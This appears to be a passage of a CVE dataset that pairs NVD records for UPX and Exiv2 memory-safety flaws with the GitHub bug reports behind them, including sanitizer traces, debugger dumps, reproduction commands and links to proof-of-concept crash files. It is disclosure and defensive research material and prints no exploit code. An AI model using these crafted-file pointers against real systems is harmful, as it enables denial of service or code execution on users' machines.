#13 0x8615fa in do_files(int, int, char**) /home/jl/work/projects/upx/upx/src/work.cpp:271
#14 0x468b28 in main /home/jl/work/projects/upx/upx/src/main.cpp:1539
#15 0x7f935989982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#16 0x4030f8 in _start (/home/jl/work/up_projects/fuzz-upx/crashes/upx.out.debug+0x4030f8)
```
## Please tell us details about your environment.
<!--- Include as many relevant details about the environment you experienced the bug in -->
* UPX version used (`upx --3.95`):
* Host Operating System and version: ubuntu 16.04
* Host CPU architecture: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
* Target Operating System and version: ubuntu 16.04
* Target CPU architecture: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
| Integer-overflow in function getElfSections at p_vmlinx.cpp:119 | https://api.github.com/repos/upx/upx/issues/286/comments | 7 | 2019-07-19T06:15:54Z | 2022-09-14T06:46:05Z | https://github.com/upx/upx/issues/286 | 470,156,643 | 286 |
CVE-2019-14296 | 2019-07-27T19:15:12.097 | canUnpack in p_vmlinx.cpp in UPX 3.95 allows remote attackers to cause a denial of service (SEGV or buffer overflow, and application crash) or possibly have unspecified other impact via a crafted UPX packed file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00003.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00007.html"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/issues/287"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCJ43HTM45GZCAQ2FLEBDNBM76V22RG/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T52JATXV6NTPTMGXCRGT37H6KXERYNZN/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:3.95:*:*:*:*:*:*:*",
"matchCriteriaId": "7986910F-E5B0-488F-813B-D6B4367F16F4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/287 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | <!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## What's the problem (or question)?
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
<!--- If suggesting a change/improvement, explain the difference from current behavior -->
An issue was discovered in upx 3.95, There is a/an buffer-overflow in function canUnpack at p_vmlinx.cpp:583
upx.out -l @@ /dev/null
## What should have happened?
<!--- If you're describing a bug, tell us what should happen -->
<!--- If you're suggesting a change/improvement, tell us how it should work -->
list compressed file
## Do you have an idea for a solution?
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
<!--- or ideas how to implement the addition or change -->
check for buffer overflow correctly
## How can we reproduce the issue?
<!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant -->
upx.out -l @@ /dev/null
the poc is attached [poc](https://github.com/aheroine/libming-bin/raw/master/crashes/upx/poc-buffer-overflow)
### source
```c
574 // check for .text .note .note and sane (.sh_size + .sh_offset)
575 p_note0 = p_note1 = p_text = 0;
576 int j;
577 Shdr *p;
578 for (p= shdri, j= ehdri.e_shnum; --j>=0; ++p) {
579 if ((unsigned)file_size < (p->sh_size + p->sh_offset)
580 || shstrsec->sh_size < (5+ p->sh_name) ) {
581 continue;
582 }
583 if (0==strcmp(".text", shstrtab + p->sh_name)) {
584 p_text = p;
585 }
586 if (0==strcmp(".note", shstrtab + p->sh_name)) {
587 if (0==p_note0) {
588 p_note0 = p;
589 } else
590 if (0==p_note1) {
591 p_note1 = p;
592 }
593 }
594 }
```
### debug
```c
pwndbg> p shstrtab
$5 = 0x611000009f00 "\200"
pwndbg> p p->sh_name
$6 = {
d = "\377\377\377\377"
}
pwndbg> p sizeof(p->sh_name )
$7 = 4
pwndbg> p/x p->sh_name
$8 = {
d = {0xff, 0xff, 0xff, 0xff}
}
pwndbg>
```
### bug report
```txt
ASAN:SIGSEGV
=================================================================
==8931==ERROR: AddressSanitizer: SEGV on unknown address 0x611100009eff (pc 0x7f66aca7d05e bp 0x7fff0bf97d90 sp 0x7fff0bf97520 T0)
#0 0x7f66aca7d05d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4705d)
#1 0x6d3087 in PackVmlinuxBase<N_Elf::ElfClass_32<N_BELE_CTP::LEPolicy> >::canUnpack() /home/jl/work/projects/upx/upx/src/p_vmlinx.cpp:583
#2 0x7a7e1d in try_unpack /home/jl/work/projects/upx/upx/src/packmast.cpp:114
#3 0x7ac2e4 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/jl/work/projects/upx/upx/src/packmast.cpp:178
#4 0x7b5282 in PackMaster::getUnpacker(InputFile*) /home/jl/work/projects/upx/upx/src/packmast.cpp:248
#5 0x7b694b in PackMaster::list() /home/jl/work/projects/upx/upx/src/packmast.cpp:279
#6 0x8604db in do_one_file(char const*, char*) /home/jl/work/projects/upx/upx/src/work.cpp:164
#7 0x8615fa in do_files(int, int, char**) /home/jl/work/projects/upx/upx/src/work.cpp:271
#8 0x468b28 in main /home/jl/work/projects/upx/upx/src/main.cpp:1539
#9 0x7f66ab1cd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#10 0x4030f8 in _start (/home/jl/work/up_projects/fuzz-upx/crashes/upx.out.debug+0x4030f8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==8931==ABORTING
```
## Please tell us details about your environment.
<!--- Include as many relevant details about the environment you experienced the bug in -->
* UPX version used (`upx --3.95`):
* Host Operating System and version: ubuntu 16.04
* Host CPU architecture: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
* Target Operating System and version: ubuntu 16.04
* Target CPU architecture: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
| canUnpack@p_vmlinx.cpp:583___buffer-overflow | https://api.github.com/repos/upx/upx/issues/287/comments | 2 | 2019-07-19T06:25:38Z | 2019-07-30T09:33:45Z | https://github.com/upx/upx/issues/287 | 470,159,542 | 287 |
CVE-2019-14368 | 2019-07-28T19:15:10.903 | Exiv2 0.27.99.0 has a heap-based buffer over-read in Exiv2::RafImage::readMetadata() in rafimage.cpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/952"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:0.27.99.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B5688A15-F378-451E-9D5B-44082AC687E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/952 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | **Describe the bug**
in my research , a heap overflow found in RafImage::readMetadata rafimage.cpp:296.
**To Reproduce**
exiv2 -pv $poc
[exiv2poc.zip](https://github.com/Exiv2/exiv2/files/3384707/exiv2poc.zip)
**Expected behavior**
```
root@ubuntu:~/fuzz/exiv2# /home/tim/exiv2-asan/build/bin/exiv2 /home/tim/fuzz/exiv2/out/master/queue/id:000174,src:000124,op:ext_AO,pos:24,+cov
=================================================================
==108944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000001b4 at pc 0x7f55a6829733 bp 0x7ffeff406e20 sp 0x7ffeff4065c8
READ of size 4 at 0x6030000001b4 thread T0
#0 0x7f55a6829732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
#1 0x7f55a5dc4723 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x7f55a5dc4723 in Exiv2::MemIo::read(unsigned char*, unsigned long) /home/tim/exiv2-asan/src/basicio.cpp:1354
#3 0x7f55a5f65c98 in Exiv2::RafImage::readMetadata() /home/tim/exiv2-asan/src/rafimage.cpp:296
#4 0x7f55a5f0fa9c in Exiv2::PgfImage::readMetadata() /home/tim/exiv2-asan/src/pgfimage.cpp:153
#5 0x5636c0fbc644 in Action::Print::printSummary() /home/tim/exiv2-asan/src/actions.cpp:260
#6 0x5636c0fc1304 in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/tim/exiv2-asan/src/actions.cpp:215
#7 0x5636c0f39692 in main /home/tim/exiv2-asan/src/exiv2.cpp:77
#8 0x7f55a526db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x5636c0f3a359 in _start (/home/tim/exiv2-asan/build/bin/exiv2+0x18359)
0x6030000001b4 is located 12 bytes to the right of 24-byte region [0x603000000190,0x6030000001a8)
allocated by thread T0 here:
#0 0x7f55a6890458 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0458)
#1 0x7f55a5eb05e9 in Exiv2::ImageFactory::open(unsigned char const*, unsigned long) /home/tim/exiv2-asan/src/image.cpp:902
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
Shadow bytes around the buggy address:
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa fd fd fd fd fa fa 00 00 00 06 fa fa fd fd
0x0c067fff8010: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00 00 06
=>0x0c067fff8030: fa fa 00 00 00 fa[fa]fa fa fa fa fa fa fa fa fa
0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==108944==ABORTING
```
**Desktop (please complete the following information):**
- ubuntu18
- gcc 7.4.0
- -fsanitize=address -g
| AddressSanitizer: heap-buffer-overflow in RafImage::readMetadata | https://api.github.com/repos/Exiv2/exiv2/issues/952/comments | 4 | 2019-07-12T02:22:41Z | 2019-07-29T16:51:35Z | https://github.com/Exiv2/exiv2/issues/952 | 467,188,161 | 952 |
CVE-2019-14369 | 2019-07-28T19:15:10.983 | Exiv2::PngImage::readMetadata() in pngimage.cpp in Exiv2 0.27.99.0 allows attackers to cause a denial of service (heap-based buffer over-read) via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/953"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:0.27.99.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B5688A15-F378-451E-9D5B-44082AC687E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/953 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | **Describe the bug**
in my research , a heap overflow found in Exiv2::readChunk(Exiv2::DataBuf&, Exiv2::BasicIo&) /src/pngimage.cpp:410.
**To Reproduce**
exiv2 -pv $poc
[poc.zip](https://github.com/Exiv2/exiv2/files/3384823/poc.zip)
**Expected behavior**
```
=================================================================
==6866==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000001b0 at pc 0x7f6fac214733 bp 0x7ffdf4470950 sp 0x7ffdf44700f8
READ of size 8 at 0x6030000001b0 thread T0
#0 0x7f6fac214732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
#1 0x7f6fab7af723 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x7f6fab7af723 in Exiv2::MemIo::read(unsigned char*, unsigned long) /home/tim/exiv2-asan/src/basicio.cpp:1354
#3 0x7f6faba0b142 in Exiv2::readChunk(Exiv2::DataBuf&, Exiv2::BasicIo&) /home/tim/exiv2-asan/src/pngimage.cpp:410
#4 0x7f6faba182f9 in Exiv2::PngImage::readMetadata() /home/tim/exiv2-asan/src/pngimage.cpp:438
#5 0x7f6fab8faa9c in Exiv2::PgfImage::readMetadata() /home/tim/exiv2-asan/src/pgfimage.cpp:153
#6 0x559495100458 in Action::Print::printList() /home/tim/exiv2-asan/src/actions.cpp:483
#7 0x55949510629d in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/tim/exiv2-asan/src/actions.cpp:218
#8 0x55949507e692 in main /home/tim/exiv2-asan/src/exiv2.cpp:77
#9 0x7f6faac58b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x55949507f359 in _start (/home/tim/exiv2-asan/build/bin/exiv2+0x18359)
0x6030000001b0 is located 2 bytes to the right of 30-byte region [0x603000000190,0x6030000001ae)
allocated by thread T0 here:
#0 0x7f6fac27b618 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0618)
#1 0x7f6fab97f0e3 in Exiv2::DataBuf::DataBuf(unsigned long) /home/tim/exiv2-asan/src/types.cpp:144
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
Shadow bytes around the buggy address:
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa fd fd fd fd fa fa 00 00 00 06 fa fa fd fd
0x0c067fff8010: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8020: fd fd fd fd fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x0c067fff8030: fa fa 00 00 00 06[fa]fa 00 00 00 fa fa fa fa fa
0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6866==ABORTING
```
**Desktop (please complete the following information):**
- ubuntu18
- gcc 7.4.0
- -fsanitize=address -g
| AddressSanitizer: heap-buffer-overflow in PngImage::readMetadata() pngimage.cpp:438 | https://api.github.com/repos/Exiv2/exiv2/issues/953/comments | 8 | 2019-07-12T03:07:03Z | 2019-07-22T09:21:12Z | https://github.com/Exiv2/exiv2/issues/953 | 467,198,124 | 953 |
CVE-2019-14370 | 2019-07-28T19:15:11.030 | In Exiv2 0.27.99.0, there is an out-of-bounds read in Exiv2::MrwImage::readMetadata() in mrwimage.cpp. It could result in denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/954"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:0.27.99.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B5688A15-F378-451E-9D5B-44082AC687E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/954 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | **Describe the bug**
in my research , a heap overflow found in Exiv2::MrwImage::readMetadata() /home/tim/exiv2-asan/src/mrwimage.cpp:131.
**To Reproduce**
exiv2 -pv $poc
[poc1.zip](https://github.com/Exiv2/exiv2/files/3385271/poc1.zip)
**Expected behavior**
```
asan output
rASAN:DEADLYSIGNAL
=================================================================
==45838==ERROR: AddressSanitizer: SEGV on unknown address 0x6030ededef5d (pc 0x7f7971f0157e bp 0x7fffb45f5a30 sp 0x7fffb45f5198 T0)
==45838==The signal is caused by a READ memory access.
#0 0x7f7971f0157d (/lib/x86_64-linux-gnu/libc.so.6+0xbb57d)
#1 0x7f79734236ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce)
#2 0x7f79729be723 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#3 0x7f79729be723 in Exiv2::MemIo::read(unsigned char*, unsigned long) /home/tim/exiv2-asan/src/basicio.cpp:1354
#4 0x7f7972aff426 in Exiv2::MrwImage::readMetadata() /home/tim/exiv2-asan/src/mrwimage.cpp:131
#5 0x7f7972b09a9c in Exiv2::PgfImage::readMetadata() /home/tim/exiv2-asan/src/pgfimage.cpp:153
#6 0x55ab241e8644 in Action::Print::printSummary() /home/tim/exiv2-asan/src/actions.cpp:260
#7 0x55ab241ed304 in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/tim/exiv2-asan/src/actions.cpp:215
#8 0x55ab24165692 in main /home/tim/exiv2-asan/src/exiv2.cpp:77
#9 0x7f7971e67b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x55ab24166359 in _start (/home/tim/exiv2-asan/build/bin/exiv2+0x18359)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb57d)
==45838==ABORTING
gdb output
gdb-peda$ r /home/tim/poc1
Starting program: /home/tim/fuzz/exiv2/exiv2 /home/tim/poc1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdf60 --> 0xedededededededed
RBX: 0xffffffff12121221
RCX: 0xedededededededed
RDX: 0x8
RSI: 0x55564368c1dd
RDI: 0x7fffffffdf60 --> 0xedededededededed
RBP: 0x8
RSP: 0x7fffffffdec8 --> 0x7ffff79796bf (<Exiv2::MemIo::read(unsigned char*, unsigned long)+63>: mov rax,QWORD PTR [r13+0x10])
RIP: 0x7ffff70d1b53 (<__memmove_avx_unaligned_erms+131>: mov rcx,QWORD PTR [rsi+rdx*1-0x8])
R8 : 0x5555557ad3a0 --> 0x7ffff7db10d0 (:MemIo+16>: 0x00007ffff7974450)
R9 : 0x0
R10: 0xa ('\n')
R11: 0x7ffff79fa3d0 (<Exiv2::getULong(unsigned char const*, Exiv2::ByteOrder)>: mov eax,DWORD PTR [rdi])
R12: 0x8
R13: 0x5555557ad3a0 --> 0x7ffff7db10d0 (:MemIo+16>: 0x00007ffff7974450)
R14: 0x7fffffffdf61 --> 0xededededededed
R15: 0x7ffff7db1438 (:IoCloser>: 0x0000000000000000)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff70d1b48 <__memmove_avx_unaligned_erms+120>: vmovdqu XMMWORD PTR [rdi],xmm0
0x7ffff70d1b4c <__memmove_avx_unaligned_erms+124>: vmovdqu XMMWORD PTR [rdi+rdx*1-0x10],xmm1
0x7ffff70d1b52 <__memmove_avx_unaligned_erms+130>: ret
=> 0x7ffff70d1b53 <__memmove_avx_unaligned_erms+131>: mov rcx,QWORD PTR [rsi+rdx*1-0x8]
0x7ffff70d1b58 <__memmove_avx_unaligned_erms+136>: mov rsi,QWORD PTR [rsi]
0x7ffff70d1b5b <__memmove_avx_unaligned_erms+139>: mov QWORD PTR [rdi+rdx*1-0x8],rcx
0x7ffff70d1b60 <__memmove_avx_unaligned_erms+144>: mov QWORD PTR [rdi],rsi
0x7ffff70d1b63 <__memmove_avx_unaligned_erms+147>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdec8 --> 0x7ffff79796bf (<Exiv2::MemIo::read(unsigned char*, unsigned long)+63>: mov rax,QWORD PTR [r13+0x10])
0008| 0x7fffffffded0 --> 0x7ffff7db1438 (:IoCloser>: 0x0000000000000000)
0016| 0x7fffffffded8 --> 0x5555557aca60 --> 0x7ffff7db22f8 (:MrwImage+16>: 0x00007ffff79d4f90)
0024| 0x7fffffffdee0 --> 0xededee05
0032| 0x7fffffffdee8 --> 0x7fffffffdf60 --> 0xedededededededed
0040| 0x7fffffffdef0 --> 0xf7ffffff
0048| 0x7fffffffdef8 --> 0x7ffff79d471b (<Exiv2::MrwImage::readMetadata()+603>: mov rdi,QWORD PTR [rbx+0x8])
0056| 0x7fffffffdf00 --> 0x7ffff7db1448 (:IoCloser+16>: 0x00007ffff7988490)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:299
299 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
gdb-peda$ bt
#0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:299
#1 0x00007ffff79796bf in memcpy (__len=<optimized out>, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 Exiv2::MemIo::read (this=0x5555557ad3a0, buf=<optimized out>, rcount=0x8) at /home/tim/exiv2/src/basicio.cpp:1354
#3 0x00007ffff79d471b in Exiv2::MrwImage::readMetadata (this=0x5555557aca60) at /home/tim/exiv2/src/mrwimage.cpp:131
#4 0x00007ffff79d7d82 in Exiv2::PgfImage::readMetadata (this=0x5555557ac920) at /home/tim/exiv2/src/pgfimage.cpp:153
#5 0x000055555557f40d in Action::Print::printSummary (this=0x5555557ada50) at /home/tim/exiv2/src/actions.cpp:260
#6 0x00005555555808c5 in Action::Print::run (this=0x5555557ada50, path="/home/tim/poc1") at /home/tim/exiv2/src/actions.cpp:215
